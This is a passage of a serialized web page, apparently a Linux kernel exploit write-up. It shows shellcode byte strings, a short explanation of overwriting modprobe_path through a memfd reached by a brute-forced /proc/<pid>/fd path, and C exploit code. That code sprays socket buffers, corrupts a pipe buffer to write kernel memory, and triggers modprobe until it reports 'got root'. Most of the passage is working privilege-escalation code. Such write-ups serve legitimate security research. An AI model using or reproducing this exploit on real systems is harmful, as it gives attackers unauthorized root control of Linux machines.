3,"value":58730},{"type":28,"tag":116,"props":59076,"children":59077},{"style":370},[59078],{"type":33,"value":2268},{"type":28,"tag":116,"props":59080,"children":59081},{"style":350},[59082],{"type":33,"value":59083}," 0x20",{"type":28,"tag":116,"props":59085,"children":59086},{"style":266},[59087],{"type":33,"value":825},{"type":28,"tag":116,"props":59089,"children":59090},{"style":563},[59091],{"type":33,"value":2240},{"type":28,"tag":116,"props":59093,"children":59094},{"style":1836},[59095],{"type":33,"value":59096},"\\xc1\\xe9\\x02\\xf3\\xa5\\xbc",{"type":28,"tag":116,"props":59098,"children":59099},{"style":563},[59100],{"type":33,"value":2240},{"type":28,"tag":116,"props":59102,"children":59103},{"style":266},[59104],{"type":33,"value":825},{"type":28,"tag":116,"props":59106,"children":59107},{"style":350},[59108],{"type":33,"value":18083},{"type":28,"tag":116,"props":59110,"children":59111},{"style":266},[59112],{"type":33,"value":1609},{"type":28,"tag":116,"props":59114,"children":59115},{"style":370},[59116],{"type":33,"value":2340},{"type":28,"tag":116,"props":59118,"children":59119},{"style":350},[59120],{"type":33,"value":2718},{"type":28,"tag":116,"props":59122,"children":59123},{"style":370},[59124],{"type":33,"value":52302},{"type":28,"tag":116,"props":59126,"children":59127},{"class":245,"line":907},[59128,59132,59136,59140,59145,59149,59153,59158,59162,59166,59171,59175,59179,59183],{"type":28,"tag":116,"props":59129,"children":59130},{"style":282},[59131],{"type":33,"value":58788},{"type":28,"tag":116,"props":59133,"children":59134},{"style":266},[59135],{"type":33,"value":58730},{"type":28,"tag":116,"props":59137,"children":59138},{"style":370},[59139],{"type":33,"value":2268},{"type":28,"tag":116,"props":59141,"children":59142},{"style":350},[59143],{"type":33,"value":59144}," 0x2a",{"type":28,"tag":116,"props":59146,"children":59147},{"style":266},[59148],{"type":33,"value":825},{"type":28,"tag":116,"props":59150,"children":59151},{"style":563},[59152],{"type":33,"value":2240},{"type":28,"tag":116,"props":59154,"children":59155},{"style":1836},[59156],{"type":33,"value":59157},"\\x0f\\x20\\xe0\\x83\\xc8\\x20\\x0f\\x22\\xe0\\xb9\\x80\\x00\\x00\\xc0\\x0f\\x32\\x0f\\xba\\xe8\\x08\\x0f\\x30\\xb8\\x00",{"type":28,"tag":116,"props":59159,"children":59160},{"style":563},[59161],{"type":33,"value":2240},{"type":28,"tag":116,"props":59163,"children":59164},{"style":266},[59165],{"type":33,"value":825},{"type":28,"tag":116,"props":59167,"children":59168},{"style":350},[59169],{"type":33,"value":59170},"24",{"type":28,"tag":116,"props":59172,"children":59173},{"style":266},[59174],{"type":33,"value":1609},{"type":28,"tag":116,"props":59176,"children":59177},{"style":370},[59178],{"type":33,"value":2340},{"type":28,"tag":116,"props":59180,"children":59181},{"style":350},[59182],{"type":33,"value":2718},{"type":28,"tag":116,"props":59184,"children":59185},{"style":370},[59186],{"type":33,"value":52302},{"type":28,"tag":116,"props":59188,"children":59189},{"class":245,"line":981},[59190,59194,59198,59202,59207,59211,59215,59220,59224,59228,59233,59237,59241,59245],{"type":28,"tag":116,"props":59191,"children":59192},{"style":282},[59193],{"type":33,"value":58788},{"type":28,"tag":116,"props":59195,"children":59196},{"style":266},[59197],{"type":33,"value":58730},{"type":28,"tag":116,"props":59199,"children":59200},{"style":370},[59201],{"type":33,"value":2268},{"type":28,"tag":116,"props":59203,"children":59204},{"style":350},[59205],{"type":33,"value":59206}," 0x45",{"type":28,"tag":116,"props":59208,"children":59209},{"style":266},[59210],{"type":33,"value":825},{"type":28,"tag":116,"props":59212,"children":59213},{"style":563},[59214],{"type":33,"value":2240},{"type":28,"tag":116,"props":59216,"children":59217},{"style":1836},[59218],{"type":33,"value":59219},"\\x0f\\x22\\xd8\\xb8\\x01\\x00\\x00\\x80\\x0f\\x22\\xc0\\xea\\x57\\x00\\x00",{"type":28,"tag":116,"props":59221,"children":59222},{"style":563},[59223],{"type":33,"value":2240},{"type":28,"tag":116,"props":59225,"children":59226},{"style":266},[59227],{"type":33,"value":825},{"type":28,"tag":116,"props":59229,"children":59230},{"style":350},[59231],{"type":33,"value":59232},"15",{"type":28,"tag":116,"props":59234,"children":59235},{"style":266},[59236],{"type":33,"value":1609},{"type":28,"tag":116,"props":59238,"children":59239},{"style":370},[59240],{"type":33,"value":2340},{"type":28,"tag":116,"props":59242,"children":59243},{"style":350},[59244],{"type":33,"value":2718},{"type":28,"tag":116,"props":59246,"children":59247},{"style":370},[59248],{"type":33,"value":52302},{"type":28,"tag":116,"props":59250,"children":59251},{"class":245,"line":1011},[59252,59256,59260,59264,59269,59273,59277,59282,59286,59290,59294,59298,59302,59306],{"type":28,"tag":116,"props":59253,"children":59254},{"style":282},[59255],{"type":33,"value":58788},{"type":28,"tag":116,"props":59257,"children":59258},{"style":266},[59259],{"type":33,"value":58730},{"type":28,"tag":116,"props":59261,"children":59262},{"style":370},[59263],{"type":33,"value":2268},{"type":28,"tag":116,"props":59265,"children":59266},{"style":350},[59267],{"type":33,"value":59268}," 0x55",{"type":28,"tag":116,"props":59270,"children":59271},{"style":266},[59272],{"type":33,"value":825},{"type":28,"tag":116,"props":59274,"children":59275},{"style":563},[59276],{"type":33,"value":2240},{"type":28,"tag":116,"props":59278,"children":59279},{"style":1836},[59280],{"type":33,"value":59281},"\\x08\\x00\\xb9\\x01\\x01\\x00\\xc0\\xb8",{"type":28,"tag":116,"props":59283,"children":59284},{"style":563},[59285],{"type":33,"value":2240},{"type":28,"tag":116,"props":59287,"children":59288},{"style":266},[59289],{"type":33,"value":825},{"type":28,"tag":116,"props":59291,"children":59292},{"style":350},[59293],{"type":33,"value":3745},{"type":28,"tag":116,"props":59295,"children":59296},{"style":266},[59297],{"type":33,"value":1609},{"type":28,"tag":116,"props":59299,"children":59300},{"style":370},[59301],{"type":33,"value":2340},{"type":28,"tag":116,"props":59303,"children":59304},{"style":350},[59305],{"type":33,"value":2718},{"type":28,"tag":116,"props":59307,"children":59308},{"style":370},[59309],{"type":33,"value":52302},{"type":28,"tag":116,"props":59311,"children":59312},{"class":245,"line":1029},[59313,59317,59321,59325,59330,59334,59338,59343,59347,59351,59355,59359,59363,59367],{"type":28,"tag":116,"props":59314,"children":59315},{"style":282},[59316],{"type":33,"value":58788},{"type":28,"tag":116,"props":59318,"children":59319},{"style":266},[59320],{"type":33,"value":58730},{"type":28,"tag":116,"props":59322,"children":59323},{"style":370},[59324],{"type":33,"value":2268},{"type":28,"tag":116,"props":59326,"children":59327},{"style":350},[59328],{"type":33,"value":59329}," 0x61",{"type":28,"tag":116,"props":59331,"children":59332},{"style":266},[59333],{"type":33,"value":825},{"type":28,"tag":116,"props":59335,"children":59336},{"style":563},[59337],{"type":33,"value":2240},{"type":28,"tag":116,"props":59339,"children":59340},{"style":1836},[59341],{"type":33,"value":59342},"\\x31\\xd2\\x0f\\x30\\xe8",{"type":28,"tag":116,"props":59344,"children":59345},{"style":563},[59346],{"type":33,"value":2240},{"type":28,"tag":116,"props":59348,"children":59349},{"style":266},[59350],{"type":33,"value":825},{"type":28,"tag":116,"props":59352,"children":59353},{"style":350},[59354],{"type":33,"value":17771},{"type":28,"tag":116,"props":59356,"children":59357},{"style":266},[59358],{"type":33,"value":1609},{"type":28,"tag":116,"props":59360,"children":59361},{"style":370},[59362],{"type":33,"value":2340},{"type":28,"tag":116,"props":59364,"children":59365},{"style":350},[59366],{"type":33,"value":2718},{"type":28,"tag":116,"props":59368,"children":59369},{"style":370},[59370],{"type":33,"value":52302},{"type":28,"tag":116,"props":59372,"children":59373},{"class":245,"line":1038},[59374,59378,59382,59386,59391,59395,59399,59404,59408,59412,59416,59420,59424,59428],{"type":28,"tag":116,"props":59375,"children":59376},{"style":282},[59377],{"type":33,"value":58788},{"type":28,"tag":116,"props":59379,"children":59380},{"style":266},[59381],{"type":33,"value":58730},{"type":28,"tag":116,"props":59383,"children":59384},{"style":370},[59385],{"type":33,"value":2268},{"type":28,"tag":116,"props":59387,"children":59388},{"style":350},[59389],{"type":33,"value":59390}," 0x6a",{"type":28,"tag":116,"props":59392,"children":59393},{"style":266},[59394],{"type":33,"value":825},{"type":28,"tag":116,"props":59396,"children":59397},{"style":563},[59398],{"type":33,"value":2240},{"type":28,"tag":116,"props":59400,"children":59401},{"style":1836},[59402],{"type":33,"value":59403},"\\x48\\xc7\\xc6",{"type":28,"tag":116,"props":59405,"children":59406},{"style":563},[59407],{"type":33,"value":2240},{"type":28,"tag":116,"props":59409,"children":59410},{"style":266},[59411],{"type":33,"value":825},{"type":28,"tag":116,"props":59413,"children":59414},{"style":350},[59415],{"type":33,"value":16957},{"type":28,"tag":116,"props":59417,"children":59418},{"style":266},[59419],{"type":33,"value":1609},{"type":28,"tag":116,"props":59421,"children":59422},{"style":370},[59423],{"type":33,"value":2340},{"type":28,"tag":116,"props":59425,"children":59426},{"style":350},[59427],{"type":33,"value":2718},{"type":28,"tag":116,"props":59429,"children":59430},{"style":370},[59431],{"type":33,"value":52302},{"type":28,"tag":116,"props":59433,"children":59434},{"class":245,"line":1047},[59435,59439,59443,59447,59452,59456,59460,59465,59469,59473,59477,59481,59485,59489],{"type":28,"tag":116,"props":59436,"children":59437},{"style":282},[59438],{"type":33,"value":58788},{"type":28,"tag":116,"props":59440,"children":59441},{"style":266},[59442],{"type":33,"value":58730},{"type":28,"tag":116,"props":59444,"children":59445},{"style":370},[59446],{"type":33,"value":2268},{"type":28,"tag":116,"props":59448,"children":59449},{"style":350},[59450],{"type":33,"value":59451}," 0x71",{"type":28,"tag":116,"props":59453,"children":59454},{"style":266},[59455],{"type":33,"value":825},{"type":28,"tag":116,"props":59457,"children":59458},{"style":563},[59459],{"type":33,"value":2240},{"type":28,"tag":116,"props":59461,"children":59462},{"style":1836},[59463],{"type":33,"value":59464},"\\x48\\xc7\\xc0\\x80\\x00\\x00",{"type":28,"tag":116,"props":59466,"children":59467},{"style":563},[59468],{"type":33,"value":2240},{"type":28,"tag":116,"props":59470,"children":59471},{"style":266},[59472],{"type":33,"value":825},{"type":28,"tag":116,"props":59474,"children":59475},{"style":350},[59476],{"type":33,"value":18083},{"type":28,"tag":116,"props":59478,"children":59479},{"style":266},[59480],{"type":33,"value":1609},{"type":28,"tag":116,"props":59482,"children":59483},{"style":370},[59484],{"type":33,"value":2340},{"type":28,"tag":116,"props":59486,"children":59487},{"style":350},[59488],{"type":33,"value":2718},{"type":28,"tag":116,"props":59490,"children":59491},{"style":370},[59492],{"type":33,"value":52302},{"type":28,"tag":116,"props":59494,"children":59495},{"class":245,"line":1071},[59496,59500,59504,59508,59513,59517,59521,59526,59530,59534,59538,59542,59546,59550],{"type":28,"tag":116,"props":59497,"children":59498},{"style":282},[59499],{"type":33,"value":58788},{"type":28,"tag":116,"props":59501,"children":59502},{"style":266},[59503],{"type":33,"value":58730},{"type":28,"tag":116,"props":59505,"children":59506},{"style":370},[59507],{"type":33,"value":2268},{"type":28,"tag":116,"props":59509,"children":59510},{"style":350},[59511],{"type":33,"value":59512}," 0x78",{"type":28,"tag":116,"props":59514,"children":59515},{"style":266},[59516],{"type":33,"value":825},{"type":28,"tag":116,"props":59518,"children":59519},{"style":563},[59520],{"type":33,"value":2240},{"type":28,"tag":116,"props":59522,"children":59523},{"style":1836},[59524],{"type":33,"value":59525},"\\xff\\xe0",{"type":28,"tag":116,"props":59527,"children":59528},{"style":563},[59529],{"type":33,"value":2240},{"type":28,"tag":116,"props":59531,"children":59532},{"style":266},[59533],{"type":33,"value":825},{"type":28,"tag":116,"props":59535,"children":59536},{"style":350},[59537],{"type":33,"value":2794},{"type":28,"tag":116,"props":59539,"children":59540},{"style":266},[59541],{"type":33,"value":1609},{"type":28,"tag":116,"props":59543,"children":59544},{"style":370},[59545],{"type":33,"value":2340},{"type":28,"tag":116,"props":59547,"children":59548},{"style":350},[59549],{"type":33,"value":2718},{"type":28,"tag":116,"props":59551,"children":59552},{"style":266},[59553],{"type":33,"value":2830},{"type":28,"tag":116,"props":59555,"children":59556},{"class":245,"line":1137},[59557,59561,59565],{"type":28,"tag":116,"props":59558,"children":59559},{"style":260},[59560],{"type":33,"value":15405},{"type":28,"tag":116,"props":59562,"children":59563},{"style":376},[59564],{"type":33,"value":1129},{"type":28,"tag":116,"props":59566,"children":59567},{"style":266},[59568],{"type":33,"value":384},{"type":28,"tag":116,"props":59570,"children":59571},{"class":245,"line":1181},[59572],{"type":28,"tag":116,"props":59573,"children":59574},{"emptyLinePlaceholder":19},[59575],{"type":33,"value":1044},{"type":28,"tag":116,"props":59577,"children":59578},{"class":245,"line":1212},[59579,59583,59587],{"type":28,"tag":116,"props":59580,"children":59581},{"style":260},[59582],{"type":33,"value":393},{"type":28,"tag":116,"props":59584,"children":59585},{"style":376},[59586],{"type":33,"value":1022},{"type":28,"tag":116,"props":59588,"children":59589},{"style":266},[59590],{"type":33,"value":384},{"type":28,"tag":116,"props":59592,"children":59593},{"class":245,"line":1254},[59594],{"type":28,"tag":116,"props":59595,"children":59596},{"style":266},[59597],{"type":33,"value":406},{"type":28,"tag":116,"props":59599,"children":59600},{"class":245,"line":1262},[59601],{"type":28,"tag":116,"props":59602,"children":59603},{"style":266},[59604],{"type":33,"value":9986},{"type":28,"tag":75,"props":59606,"children":59608},{"id":59607},"overwriting-modprobe_path",[59609,59611],{"type":33,"value":59610},"Overwriting ",{"type":28,"tag":98,"props":59612,"children":59614},{"className":59613},[],[59615],{"type":33,"value":57996},{"type":28,"tag":29,"props":59617,"children":59618},{},[59619,59621,59627],{"type":33,"value":59620},"Finding the ",{"type":28,"tag":98,"props":59622,"children":59624},{"className":59623},[],[59625],{"type":33,"value":59626},"/sbin/modprobe",{"type":33,"value":59628}," string in kernel memory and replacing it with a controlled value that points to a file we own finally becomes relatively trivial.",{"type":28,"tag":29,"props":59630,"children":59631},{},[59632,59634,59640],{"type":33,"value":59633},"A very well-known trick for this to work, although we are running in a chroot without being able to create files at the root filesystem, is using a memfd exposed through ",{"type":28,"tag":98,"props":59635,"children":59637},{"className":59636},[],[59638],{"type":33,"value":59639},"/proc/\u003Cpid>/fd/\u003Cn>.",{"type":33,"value":59641}," It's worth adding that, given that our pid outside the unprivileged namespace is unknown to us, we brute-force it.",{"type":28,"tag":234,"props":59643,"children":59645},{"className":28765,"code":59644,"language":28767,"meta":7,"style":7},"[...]\n    puts(\"[*] overwrite modprobe_path\");\n    for (int i = 0; i \u003C 4194304; i++)\n    {\n        pipebuf->page = modprobe_page;\n        pipebuf->offset = modprobe_off;\n        pipebuf->len = 0;\n        for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n        {\n            if (write(sock[i][0], pipebuf, 1024 - 320) \u003C 0)\n            {\n                perror(\"[-] write(socket)\");\n                break;\n            }\n        }\n\n        memset(&data, 0, PAGE_SIZE);\n        snprintf(fd_path, sizeof(fd_path), \"/proc/%i/fd/%i\", i, modprobe_fd);\n\n        lseek(modprobe_fd, 0, SEEK_SET);\n        dprintf(modprobe_fd, MODPROBE_SCRIPT, i, status_fd, i, stdin_fd, i, stdout_fd);\n\n        if (write(pfd[pipe_idx][1], fd_path, 32) \u003C 0)\n        {\n            perror(\"\\n[-] write(pipe)\");\n        }\n\n        if (check_modprobe(fd_path))\n        {\n            puts(\"[-] failed to overwrite modprobe\");\n            break;\n        }\n\n        if (trigger_modprobe(status_fd))\n        {\n            puts(\"\\n[+] got root\");\n            goto out;\n        }\n\n        for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n        {\n            if (read(sock[i][1], leak, 1024 - 320) \u003C 0)\n            {\n                perror(\"[-] read(socket)\");\n                return -1;\n            }\n        }\n    }\n    puts(\"[-] fake modprobe failed\");\n[...]\n",[59646],{"type":28,"tag":98,"props":59647,"children":59648},{"__ignoreMap":7},[59649,59656,59678,59686,59693,59701,59709,59717,59725,59732,59740,59747,59785,59796,59803,59810,59817,59844,59875,59882,59904,59917,59924,59982,59989,60017,60024,60031,60052,60059,60080,60091,60098,60105,60126,60133,60161,60174,60181,60188,60237,60244,60312,60319,60340,60360,60367,60374,60381,60401],{"type":28,"tag":116,"props":59650,"children":59651},{"class":245,"line":246},[59652],{"type":28,"tag":116,"props":59653,"children":59654},{"style":266},[59655],{"type":33,"value":9986},{"type":28,"tag":116,"props":59657,"children":59658},{"class":245,"line":256},[59659,59664,59669,59674],{"type":28,"tag":116,"props":59660,"children":59661},{"style":266},[59662],{"type":33,"value":59663},"    puts(\"[*] ",{"type":28,"tag":116,"props":59665,"children":59666},{"style":339},[59667],{"type":33,"value":59668},"overwrite",{"type":28,"tag":116,"props":59670,"children":59671},{"style":339},[59672],{"type":33,"value":59673}," modprobe_path",{"type":28,"tag":116,"props":59675,"children":59676},{"style":563},[59677],{"type":33,"value":55910},{"type":28,"tag":116,"props":59679,"children":59680},{"class":245,"line":293},[59681],{"type":28,"tag":116,"props":59682,"children":59683},{"style":563},[59684],{"type":33,"value":59685},"    for (int i = 0; i \u003C 4194304; i++)\n",{"type":28,"tag":116,"props":59687,"children":59688},{"class":245,"line":361},[59689],{"type":28,"tag":116,"props":59690,"children":59691},{"style":563},[59692],{"type":33,"value":28842},{"type":28,"tag":116,"props":59694,"children":59695},{"class":245,"line":387},[59696],{"type":28,"tag":116,"props":59697,"children":59698},{"style":563},[59699],{"type":33,"value":59700},"        pipebuf->page = modprobe_page;\n",{"type":28,"tag":116,"props":59702,"children":59703},{"class":245,"line":400},[59704],{"type":28,"tag":116,"props":59705,"children":59706},{"style":563},[59707],{"type":33,"value":59708},"        pipebuf->offset = modprobe_off;\n",{"type":28,"tag":116,"props":59710,"children":59711},{"class":245,"line":614},[59712],{"type":28,"tag":116,"props":59713,"children":59714},{"style":563},[59715],{"type":33,"value":59716},"        pipebuf->len = 0;\n",{"type":28,"tag":116,"props":59718,"children":59719},{"class":245,"line":631},[59720],{"type":28,"tag":116,"props":59721,"children":59722},{"style":563},[59723],{"type":33,"value":59724},"        for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n",{"type":28,"tag":116,"props":59726,"children":59727},{"class":245,"line":665},[59728],{"type":28,"tag":116,"props":59729,"children":59730},{"style":563},[59731],{"type":33,"value":31308},{"type":28,"tag":116,"props":59733,"children":59734},{"class":245,"line":713},[59735],{"type":28,"tag":116,"props":59736,"children":59737},{"style":563},[59738],{"type":33,"value":59739},"            if (write(sock[i][0], pipebuf, 1024 - 320) \u003C 0)\n",{"type":28,"tag":116,"props":59741,"children":59742},{"class":245,"line":750},[59743],{"type":28,"tag":116,"props":59744,"children":59745},{"style":563},[59746],{"type":33,"value":31344},{"type":28,"tag":116,"props":59748,"children":59749},{"class":245,"line":779},[59750,59755,59759,59763,59767,59772,59776,59780],{"type":28,"tag":116,"props":59751,"children":59752},{"style":563},[59753],{"type":33,"value":59754},"                perror(\"",{"type":28,"tag":116,"props":59756,"children":59757},{"style":266},[59758],{"type":33,"value":347},{"type":28,"tag":116,"props":59760,"children":59761},{"style":370},[59762],{"type":33,"value":3996},{"type":28,"tag":116,"props":59764,"children":59765},{"style":266},[59766],{"type":33,"value":8333},{"type":28,"tag":116,"props":59768,"children":59769},{"style":339},[59770],{"type":33,"value":59771},"write",{"type":28,"tag":116,"props":59773,"children":59774},{"style":266},[59775],{"type":33,"value":313},{"type":28,"tag":116,"props":59777,"children":59778},{"style":339},[59779],{"type":33,"value":41559},{"type":28,"tag":116,"props":59781,"children":59782},{"style":266},[59783],{"type":33,"value":59784},")\");\n",{"type":28,"tag":116,"props":59786,"children":59787},{"class":245,"line":796},[59788,59792],{"type":28,"tag":116,"props":59789,"children":59790},{"style":260},[59791],{"type":33,"value":58578},{"type":28,"tag":116,"props":59793,"children":59794},{"style":266},[59795],{"type":33,"value":384},{"type":28,"tag":116,"props":59797,"children":59798},{"class":245,"line":847},[59799],{"type":28,"tag":116,"props":59800,"children":59801},{"style":266},[59802],{"type":33,"value":58503},{"type":28,"tag":116,"props":59804,"children":59805},{"class":245,"line":898},[59806],{"type":28,"tag":116,"props":59807,"children":59808},{"style":266},[59809],{"type":33,"value":1954},{"type":28,"tag":116,"props":59811,"children":59812},{"class":245,"line":907},[59813],{"type":28,"tag":116,"props":59814,"children":59815},{"emptyLinePlaceholder":19},[59816],{"type":33,"value":1044},{"type":28,"tag":116,"props":59818,"children":59819},{"class":245,"line":981},[59820,59824,59828,59832,59836,59840],{"type":28,"tag":116,"props":59821,"children":59822},{"style":282},[59823],{"type":33,"value":54235},{"type":28,"tag":116,"props":59825,"children":59826},{"style":266},[59827],{"type":33,"value":313},{"type":28,"tag":116,"props":59829,"children":59830},{"style":370},[59831],{"type":33,"value":2780},{"type":28,"tag":116,"props":59833,"children":59834},{"style":266},[59835],{"type":33,"value":58389},{"type":28,"tag":116,"props":59837,"children":59838},{"style":350},[59839],{"type":33,"value":353},{"type":28,"tag":116,"props":59841,"children":59842},{"style":266},[59843],{"type":33,"value":58398},{"type":28,"tag":116,"props":59845,"children":59846},{"class":245,"line":1011},[59847,59851,59856,59860,59865,59870],{"type":28,"tag":116,"props":59848,"children":59849},{"style":282},[59850],{"type":33,"value":54936},{"type":28,"tag":116,"props":59852,"children":59853},{"style":266},[59854],{"type":33,"value":59855},"(fd_path, ",{"type":28,"tag":116,"props":59857,"children":59858},{"style":376},[59859],{"type":33,"value":54946},{"type":28,"tag":116,"props":59861,"children":59862},{"style":266},[59863],{"type":33,"value":59864},"(fd_path), ",{"type":28,"tag":116,"props":59866,"children":59867},{"style":563},[59868],{"type":33,"value":59869},"\"/proc/%i/fd/%i\"",{"type":28,"tag":116,"props":59871,"children":59872},{"style":266},[59873],{"type":33,"value":59874},", i, modprobe_fd);\n",{"type":28,"tag":116,"props":59876,"children":59877},{"class":245,"line":1029},[59878],{"type":28,"tag":116,"props":59879,"children":59880},{"emptyLinePlaceholder":19},[59881],{"type":33,"value":1044},{"type":28,"tag":116,"props":59883,"children":59884},{"class":245,"line":1038},[59885,59890,59895,59899],{"type":28,"tag":116,"props":59886,"children":59887},{"style":282},[59888],{"type":33,"value":59889},"        lseek",{"type":28,"tag":116,"props":59891,"children":59892},{"style":266},[59893],{"type":33,"value":59894},"(modprobe_fd, ",{"type":28,"tag":116,"props":59896,"children":59897},{"style":350},[59898],{"type":33,"value":353},{"type":28,"tag":116,"props":59900,"children":59901},{"style":266},[59902],{"type":33,"value":59903},", SEEK_SET);\n",{"type":28,"tag":116,"props":59905,"children":59906},{"class":245,"line":1047},[59907,59912],{"type":28,"tag":116,"props":59908,"children":59909},{"style":282},[59910],{"type":33,"value":59911},"        dprintf",{"type":28,"tag":116,"props":59913,"children":59914},{"style":266},[59915],{"type":33,"value":59916},"(modprobe_fd, MODPROBE_SCRIPT, i, status_fd, i, stdin_fd, i, stdout_fd);\n",{"type":28,"tag":116,"props":59918,"children":59919},{"class":245,"line":1071},[59920],{"type":28,"tag":116,"props":59921,"children":59922},{"emptyLinePlaceholder":19},[59923],{"type":33,"value":1044},{"type":28,"tag":116,"props":59925,"children":59926},{"class":245,"line":1137},[59927,59931,59935,59939,59943,59947,59952,59956,59961,59966,59970,59974,59978],{"type":28,"tag":116,"props":59928,"children":59929},{"style":260},[59930],{"type":33,"value":2943},{"type":28,"tag":116,"props":59932,"children":59933},{"style":266},[59934],{"type":33,"value":269},{"type":28,"tag":116,"props":59936,"children":59937},{"style":282},[59938],{"type":33,"value":59771},{"type":28,"tag":116,"props":59940,"children":59941},{"style":266},[59942],{"type":33,"value":313},{"type":28,"tag":116,"props":59944,"children":59945},{"style":272},[59946],{"type":33,"value":58442},{"type":28,"tag":116,"props":59948,"children":59949},{"style":266},[59950],{"type":33,"value":59951},"[pipe_idx][",{"type":28,"tag":116,"props":59953,"children":59954},{"style":350},[59955],{"type":33,"value":1824},{"type":28,"tag":116,"props":59957,"children":59958},{"style":266},[59959],{"type":33,"value":59960},"], fd_path, ",{"type":28,"tag":116,"props":59962,"children":59963},{"style":350},[59964],{"type":33,"value":59965},"32",{"type":28,"tag":116,"props":59967,"children":59968},{"style":266},[59969],{"type":33,"value":1609},{"type":28,"tag":116,"props":59971,"children":59972},{"style":370},[59973],{"type":33,"value":514},{"type":28,"tag":116,"props":59975,"children":59976},{"style":350},[59977],{"type":33,"value":2718},{"type":28,"tag":116,"props":59979,"children":59980},{"style":266},[59981],{"type":33,"value":2830},{"type":28,"tag":116,"props":59983,"children":59984},{"class":245,"line":1181},[59985],{"type":28,"tag":116,"props":59986,"children":59987},{"style":266},[59988],{"type":33,"value":31308},{"type":28,"tag":116,"props":59990,"children":59991},{"class":245,"line":1212},[59992,59996,60000,60004,60008,60013],{"type":28,"tag":116,"props":59993,"children":59994},{"style":282},[59995],{"type":33,"value":57516},{"type":28,"tag":116,"props":59997,"children":59998},{"style":266},[59999],{"type":33,"value":313},{"type":28,"tag":116,"props":60001,"children":60002},{"style":563},[60003],{"type":33,"value":2240},{"type":28,"tag":116,"props":60005,"children":60006},{"style":1836},[60007],{"type":33,"value":1839},{"type":28,"tag":116,"props":60009,"children":60010},{"style":563},[60011],{"type":33,"value":60012},"[-] write(pipe)\"",{"type":28,"tag":116,"props":60014,"children":60015},{"style":266},[60016],{"type":33,"value":895},{"type":28,"tag":116,"props":60018,"children":60019},{"class":245,"line":1254},[60020],{"type":28,"tag":116,"props":60021,"children":60022},{"style":266},[60023],{"type":33,"value":1954},{"type":28,"tag":116,"props":60025,"children":60026},{"class":245,"line":1262},[60027],{"type":28,"tag":116,"props":60028,"children":60029},{"emptyLinePlaceholder":19},[60030],{"type":33,"value":1044},{"type":28,"tag":116,"props":60032,"children":60033},{"class":245,"line":1294},[60034,60038,60042,60047],{"type":28,"tag":116,"props":60035,"children":60036},{"style":260},[60037],{"type":33,"value":2943},{"type":28,"tag":116,"props":60039,"children":60040},{"style":266},[60041],{"type":33,"value":269},{"type":28,"tag":116,"props":60043,"children":60044},{"style":282},[60045],{"type":33,"value":60046},"check_modprobe",{"type":28,"tag":116,"props":60048,"children":60049},{"style":266},[60050],{"type":33,"value":60051},"(fd_path))\n",{"type":28,"tag":116,"props":60053,"children":60054},{"class":245,"line":1334},[60055],{"type":28,"tag":116,"props":60056,"children":60057},{"style":266},[60058],{"type":33,"value":31308},{"type":28,"tag":116,"props":60060,"children":60061},{"class":245,"line":1372},[60062,60067,60071,60076],{"type":28,"tag":116,"props":60063,"children":60064},{"style":282},[60065],{"type":33,"value":60066},"            puts",{"type":28,"tag":116,"props":60068,"children":60069},{"style":266},[60070],{"type":33,"value":313},{"type":28,"tag":116,"props":60072,"children":60073},{"style":563},[60074],{"type":33,"value":60075},"\"[-] failed to overwrite modprobe\"",{"type":28,"tag":116,"props":60077,"children":60078},{"style":266},[60079],{"type":33,"value":895},{"type":28,"tag":116,"props":60081,"children":60082},{"class":245,"line":1381},[60083,60087],{"type":28,"tag":116,"props":60084,"children":60085},{"style":260},[60086],{"type":33,"value":2969},{"type":28,"tag":116,"props":60088,"children":60089},{"style":266},[60090],{"type":33,"value":384},{"type":28,"tag":116,"props":60092,"children":60093},{"class":245,"line":1389},[60094],{"type":28,"tag":116,"props":60095,"children":60096},{"style":266},[60097],{"type":33,"value":1954},{"type":28,"tag":116,"props":60099,"children":60100},{"class":245,"line":1425},[60101],{"type":28,"tag":116,"props":60102,"children":60103},{"emptyLinePlaceholder":19},[60104],{"type":33,"value":1044},{"type":28,"tag":116,"props":60106,"children":60107},{"class":245,"line":1448},[60108,60112,60116,60121],{"type":28,"tag":116,"props":60109,"children":60110},{"style":260},[60111],{"type":33,"value":2943},{"type":28,"tag":116,"props":60113,"children":60114},{"style":266},[60115],{"type":33,"value":269},{"type":28,"tag":116,"props":60117,"children":60118},{"style":282},[60119],{"type":33,"value":60120},"trigger_modprobe",{"type":28,"tag":116,"props":60122,"children":60123},{"style":266},[60124],{"type":33,"value":60125},"(status_fd))\n",{"type":28,"tag":116,"props":60127,"children":60128},{"class":245,"line":1456},[60129],{"type":28,"tag":116,"props":60130,"children":60131},{"style":266},[60132],{"type":33,"value":31308},{"type":28,"tag":116,"props":60134,"children":60135},{"class":245,"line":1520},[60136,60140,60144,60148,60152,60157],{"type":28,"tag":116,"props":60137,"children":60138},{"style":282},[60139],{"type":33,"value":60066},{"type":28,"tag":116,"props":60141,"children":60142},{"style":266},[60143],{"type":33,"value":313},{"type":28,"tag":116,"props":60145,"children":60146},{"style":563},[60147],{"type":33,"value":2240},{"type":28,"tag":116,"props":60149,"children":60150},{"style":1836},[60151],{"type":33,"value":1839},{"type":28,"tag":116,"props":60153,"children":60154},{"style":563},[60155],{"type":33,"value":60156},"[+] got root\"",{"type":28,"tag":116,"props":60158,"children":60159},{"style":266},[60160],{"type":33,"value":895},{"type":28,"tag":116,"props":60162,"children":60163},{"class":245,"line":1580},[60164,60169],{"type":28,"tag":116,"props":60165,"children":60166},{"style":260},[60167],{"type":33,"value":60168},"            goto",{"type":28,"tag":116,"props":60170,"children":60171},{"style":266},[60172],{"type":33,"value":60173}," out;\n",{"type":28,"tag":116,"props":60175,"children":60176},{"class":245,"line":1620},[60177],{"type":28,"tag":116,"props":60178,"children":60179},{"style":266},[60180],{"type":33,"value":1954},{"type":28,"tag":116,"props":60182,"children":60183},{"class":245,"line":1668},[60184],{"type":28,"tag":116,"props":60185,"children":60186},{"emptyLinePlaceholder":19},[60187],{"type":33,"value":1044},{"type":28,"tag":116,"props":60189,"children":60190},{"class":245,"line":1677},[60191,60196,60200,60204,60208,60212,60216,60220,60224,60229,60233],{"type":28,"tag":116,"props":60192,"children":60193},{"style":260},[60194],{"type":33,"value":60195},"        